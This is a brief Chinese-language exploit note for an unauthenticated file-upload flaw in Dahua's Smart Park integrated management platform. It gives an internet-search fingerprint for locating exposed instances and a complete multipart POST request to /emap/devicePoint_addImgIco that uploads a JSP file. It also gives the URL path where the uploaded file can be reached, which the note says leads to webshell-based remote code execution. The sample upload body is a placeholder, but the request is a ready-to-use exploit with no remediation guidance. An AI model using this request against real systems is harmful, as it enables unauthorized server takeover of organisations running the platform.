大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞,未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。
app="dahua-智慧园区综合管理平台"POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Java/1.8.0_345
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 229
Connection: close
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
123456
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
文件路径 http://ip:port/upload/emap/society_new/+文件名